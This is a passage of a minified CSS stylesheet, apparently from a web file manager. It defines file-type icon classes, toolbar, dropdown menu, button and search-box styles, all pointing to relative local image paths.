\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');}.x-xlt{background-image:url("../../../images/file_icon/icon_file/xlt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');}.x-xltx{background-image:url("../../../images/file_icon/icon_file/xltx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');}.x-xml{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-xps{background-image:url("../../../images/file_icon/icon_file/xps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');}.x-xsd{background-image:url("../../../images/file_icon/icon_file/xsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');}.x-xsl{background-image:url("../../../images/file_icon/icon_file/xsl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');}.x-y{background-image:url("../../../images/file_icon/icon_file/y.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');}.x-zip{background-image:url("../../../images/file_icon/icon_file/zip.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');}.x-3dm,.x-3ds,.x-asm,.x-cam360,.x-catpart,.x-catproduct,.x-cgr,.x-collaboration,.x-dae,.x-dgn,.x-dlv3,.x-dwf,.x-dwfx,.x-dwg,.x-dwt,.x-dxf,.x-exp,.x-f3d,.x-fbx,.x-g,.x-gbxml,.x-iam,.x-idw,.x-ifc,.x-ige,.x-iges,.x-igs,.x-ipt,.x-jt,.x-model,.x-neu,.x-nwc,.x-nwd,.x-obj,.x-prt,.x-rvt,.x-sab,.x-sat,.x-session,.x-skp,.x-sldasm,.x-sldprt,.x-smb,.x-smt,.x-ste,.x-step,.x-stl,.x-stla,.x-stlb,.x-stp,.x-wire,.x-x_b,.x-x_t,.x-xas,.x-xpr{background-image:url("../../../images/file_icon/icon_file/autodesk/autodesk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');}.x-3ds{background-image:url("../../../images/file_icon/icon_file/autodesk/3ds.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');}.x-3dm{background-image:url("../../../images/file_icon/icon_file/autodesk/3dm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');}.x-dae{background-image:url("../../../images/file_icon/icon_file/autodesk/dae.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');}.x-stl,.x-stla,.x-stlb{background-image:url("../../../images/file_icon/icon_file/autodesk/stl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');}.x-dwg{background-image:url("../../../images/file_icon/icon_file/autodesk/dwg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');}.x-dwf{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dwfx{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dxf{background-image:url("../../../images/file_icon/icon_file/autodesk/dxf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');}.x-ifc{background-image:url("../../../images/file_icon/icon_file/autodesk/ifc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');}.x-iam{background-image:url("../../../images/file_icon/icon_file/autodesk/iam.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');}.x-fbx{background-image:url("../../../images/file_icon/icon_file/autodesk/fbx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');}.x-rvt{background-image:url("../../../images/file_icon/icon_file/autodesk/rvt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');}.x-skp{background-image:url("../../../images/file_icon/icon_file/autodesk/skp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');}.x-vnd,.x-dgn{background-image:url("../../../images/file_icon/icon_file/autodesk/vnd-dgn.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');}.x-folder{background-image:url("../../../images/file_icon/icon_others/folder.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');}.x-folder-share{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-recycle{background-image:url("../../../images/file_icon/icon_others/recycle.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');}.x-recycle-full{background-image:url("../../../images/file_icon/icon_others/recycle_full.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');}.x-path-self-share{background-image:url("../../../images/file_icon/icon_others/path_self_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');}.x-app-link{background-image:url("../../../images/file_icon/icon_others/app_link.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');}.x-user{background-image:url("../../../images/file_icon/icon_others/user.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');}.x-user-self{background-image:url("../../../images/file_icon/icon_others/userSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');}.x-share{background-image:url("../../../images/file_icon/icon_others/share.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');}.x-group-self{background-image:url("../../../images/file_icon/icon_others/groupSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');}.x-group-self-owner{background-image:url("../../../images/file_icon/icon_others/groupSelfOwner.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');}.x-group-guest{background-image:url("../../../images/file_icon/icon_others/groupGuest.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');}.x-group-self-root{background-image:url("../../../images/file_icon/icon_others/groupSelfRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');}.x-group-root{background-image:url("../../../images/file_icon/icon_others/groupRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');}.x-group-public{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-tree-self{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-computer{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-tree-fav{background-image:url("../../../images/file_icon/icon_others/treeFav.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');}.x-edit{background-image:url("../../../images/file_icon/icon_others/edit.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');}.x-search{background-image:url("../../../images/file_icon/icon_others/search.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');}.x-upload{background-image:url("../../../images/file_icon/icon_others/upload.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');}.x-setting{background-image:url("../../../images/file_icon/icon_others/setting.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');}.x-logout{background-image:url("../../../images/file_icon/icon_others/logout.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');}.x-app-store{background-image:url("../../../images/file_icon/icon_others/appStore.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');}.x-error{background-image:url("../../../images/file_icon/icon_others/error.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');}.x-info{background-image:url("../../../images/file_icon/icon_others/info.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');}.frame-fullscreen{position:fixed;z-index:999499;left:0;top:0;}.font-icon{font-family:FontAwesome;font-style:normal;color:inherit;}.dragMaskView{position:absolute;top:0;left:0;right:0;bottom:0;z-index:888;background:#fff;opacity:0.01;filter:alpha(opacity=1);-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.content-box .ace_cjk{width:1em !important;}.content-box .ace_static_highlight{font-size:1.15em;}.aui-buttons button{font-size:1em;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.dialog-change-max,.dialog-change-max .aui-main{-webkit-transition:all 0.25s;-moz-transition:all 0.25s;-o-transition:all 0.25s;-ms-transition:all 0.25s;transition:all 0.25s;}.aui-title span{position:absolute;width:80%;overflow:hidden;height:30px;word-break:break-all;text-overflow:ellipsis;white-space:nowrap;}.less-error-message{display:none;}[class^="icon-"],[class*=" icon-"]{background-image:auto;}.btn-group-sm>.btn{padding:4px 10px;line-height:1em;}.btn{padding:6px 14px;border-radius:3px;box-sizing:content-box;}.btn:focus{outline:none;}.btn.btn-default .font-icon{color:#999;}.btn.btn-default:active,.btn.btn-default.active{border-color:#ADADAD;color:#888;}.btn.btn-left{border-top-right-radius:0;border-bottom-right-radius:0;}.btn.btn-middle{border-radius:0;}.btn.btn-right{border-top-left-radius:0;border-bottom-left-radius:0;}.btn.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;}.btn.btn-nomal{padding:4px 12px;}.btn.btn-sm{padding:2px 10px;}.btn.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;}.btn.btn-active{background:#63acff !important;border-color:#4fa1ff !important;border-bottom-color:#449cff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8cc2ff', endColorstr='#63acff');background-image:-webkit-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-moz-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-o-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-ms-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);-pie-background:linear-gradient(to to bottom,#8cc2ff 0,#63acff 100%);}.btn.btn-active:hover,.btn.btn-active:active{background:#3a96ff !important;border-color:#268bff !important;border-bottom-color:#1c86ff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#63acff', endColorstr='#3a96ff');background-image:-webkit-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-moz-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-o-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-ms-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:linear-gradient(to bottom,#63acff 0,#3a96ff 100%);-pie-background:linear-gradient(to to bottom,#63acff 0,#3a96ff 100%);}.btn-group.disabled{opacity:0.6;filter:alpha(opacity=60);}.dropdown-menu{left:auto;right:0px;border-radius:4px;border:1px solid rgba(0,0,0,0.05);box-shadow:0 4px 30px rgba(0,0,0,0.15);max-height:400px;margin-top:0;}.dropdown-menu>li>a:hover,.dropdown-menu .this a,.dropdown-menu>li>a:focus{-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;background-image:none;filter:none;background:#63acff;color:#fff;}.dropdown-menu>li>a{font-weight:inherit;color:#666;}.dropdown-menu>li>a .font-icon{opacity:0.8;}.dropdown-menu:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);border-right:6px solid rgba(0,0,0,0);border-bottom:6px solid #FFF;position:absolute;top:-6px;right:10px;}.dropdown-menu:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);top:-7px;border-bottom:7px solid #CCC;border-bottom-color:rgba(0,0,0,0.2);right:9px;}.dropdown-menu.menu-top:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);top:inherit;border-right:6px solid rgba(0,0,0,0);border-top:6px solid #FFF;border-bottom:none;position:absolute;bottom:-6px;right:10px;}.dropdown-menu.menu-top:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-bottom:none;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);bottom:-7px;border-top:7px solid #CCC;border-top-color:rgba(0,0,0,0.2);right:9px;top:inherit;}.dropdown-menu .divider{margin:0.3em 0;}input{border:1px solid #ddd;background:#fff;outline:none;}input[type="radio"],input[type="checkbox"]{border:none;background:none;}.topbar{width:100%;height:40px;color:#ddd;top:0;background:#63acff;position:absolute;z-index:auto;}.topbar .content{padding:0px;line-height:40px;height:39px;word-break:break-all;}.topbar .content i.font-icon{display:inline-block;padding-right:10px;font-size:1.1em;}.topbar .content .topbar-menu{display:block;text-decoration:none;color:#fff;border:1px solid #4a9eff;overflow:hidden;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;padding:0px 1.2em;border-top:none;border-bottom:none;outline:none;float:left;margin-left:-1px;font-size:14px;}.topbar .content .topbar-menu.title{font-size:20px;width:200px;width:202px\0;padding:0;text-align:center;}.topbar .content .topbar-menu.title:hover{background:none;}.topbar .content .topbar-menu .icon{width:25px;height:25px;margin-right:5px;padding:0;margin-top:-4px;font-size:13px;line-height:25px;text-align:center;background:none;}.topbar .content .title img{max-width:200px;max-height:44px;}.topbar .content .open .topbar-menu,.topbar .content .topbar-menu:hover,.topbar .content .topbar-menu.this{background:#4a9eff;}.topbar .content .menu-desktop:before{content:"\f108";}.topbar .content .menu-explorer:before{content:"\f0ae";}.topbar .content .menu-editor:before{content:"\f044";}.topbar .content .top-left.collapse{display:block;height:auto !important;}.topbar .content .top-left{overflow:hidden;height:40px;width:70%;}.topbar .content .top-right{position:absolute;right:0px;top:0px;margin-right:0px;height:40px;}.topbar .content .top-right .menu-group{height:40px;margin-right:-1px;float:left;position:relative;}.topbar .content .top-right .topbar-menu{display:inline-block;padding:0px 6px;margin-right:1px;}.topbar .content .top-right .topbar-menu i{padding-right:3px;}.topbar .content .top-right .btn{color:#fff;}.topbar .content .top-right ul a{line-height:30px;height:30px;display:block;padding:0px 1.7em;border:none;overflow:hidden;}.topbar .content .top-right ul a:hover,.topbar .content .top-right ul a.this{margin-right:0px;}.topbar .content .top-right ul a.this{background:#63acff;color:#fff;}.topbar .content .top-right ul .font-icon{width:18px;display:inline-block;}.topbar .content .top-right ul.dropdown-menu{margin-top:-1px;}.topbar .content .top-right ul.dropdown-menu.topbar-language{width:470px;padding:10px 5px;}.topbar .content .top-right ul.dropdown-menu.topbar-language li{width:115px;float:left;margin:0 1px 1px 0;}.topbar .content .top-right ul.dropdown-menu.topbar-language a{padding:0 8px 0 8px;height:26px;line-height:26px;font-size:13px;}.topbar .content .top-right ul.dropdown-menu.topbar-language i.flag{padding-right:0px;background-color:#eee;position:relative;top:1px;}.topbar .content .share-title{text-align:center;color:#fff;float:left;margin-left:8px;margin-right:7px;}.topbar .content .share-title-info{color:#fff;font-size:1.25em;background:#eee;background:rgba(0,0,0,0.2);border-radius:4px;padding:6px;}.topbar .content .share-info{color:#fff;float:left;font-size:1em;}.topbar .content .share-info .time{padding-left:5px;color:#fff;padding-right:8px;}.topbar .content .top-right div.share-info-user{margin-right:10px;color:#fff;position:relative;}.topbar .content .top-right div.share-info-user .btn-download,.topbar .content .top-right div.share-info-user .btn.button-my-share{padding:4px 20px;margin-left:5px;}.topbar .content .top-right div.share-info-user .dropdown-toggle{height:16px;}.common-footer{position:fixed;bottom:0px;background:#f8f8f8;color:#999;font-size:1em;width:100%;text-align:center;border-top:1px solid #e8e8e8;height:31px;line-height:32px;overflow:hidden;}.common-footer .copyright-bottom{cursor:pointer;font-size:1.25em;color:#aaa;text-decoration:none;}.common-footer .copyright-bottom:hover{color:#f60;border-bottom:none;}.desktop-widget{z-index:10 !important;}.do-search-box{color:#888;}.do-search-box .search-header{padding:10px;padding-bottom:0px;}.do-search-box .search-header input[type='checkbox']{padding-left:0px;}.do-search-box .search-header label{font-size:1em;}.do-search-box .search-header .btn-right{margin:0px 0 0 -2px;height:25px;width:30px;padding:0;height:28px \9\0;position:absolute !important;}.do-search-box .search-header .s_br{margin-bottom:8px;line-height:25px;}.do-search-box .search-header #search-value,.do-search-box .search-header #search-path,.do-search-box .search-header #search-ext{height:23px;height:27px \0;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:125px;padding-left:10px;padding-right:10px;margin-left:5px;}.do-search-box .search-header #search-value:focus,.do-search-box .search-header #search-path:focus,.do-search-box .search-header #search-ext:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.do-search-box .search-header #search-value{width:190px;margin:0;padding:2px 5px 0px 5px;padding-top:1px \0;}.do-search-box #search-is-case{margin-left:10px;}.do-search-box .search-desc{height:30px;line-height:30px;text-align:center;font-size:13px;margin:0px 10px;border:1px solid #ddd;color:#3196e6;background-image:-webkit-linear-gradient(top,#fff,#def);border-top-left-radius:3px;border-top-right-radius:3px;}.do-search-box .search-result{overflow-y:auto;overflow-x:hidden;position:absolute;top:137px;bottom:0px;right:0px;left:0px;margin:10px;border:1px solid #ddd;border-top:none;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-items{list-style:none;margin:0px;padding:10px 0;font-size:13px;}.do-search-box .search-result .file-item .file-info{height:25px;line-height:25px;cursor:default;padding-left:10px;font-size:13px;color:#444;position:relative;word-wrap:break-word;word-break:break-all;overflow:hidden;}.do-search-box .search-result .file-item .file-info:hover{background:#eee;}.do-search-box .search-result .file-item .file-info .title{height:25px;color:#666;padding-left:5px;}.do-search-box .search-result .file-item .file-info .title:hover{border-bottom:1px solid 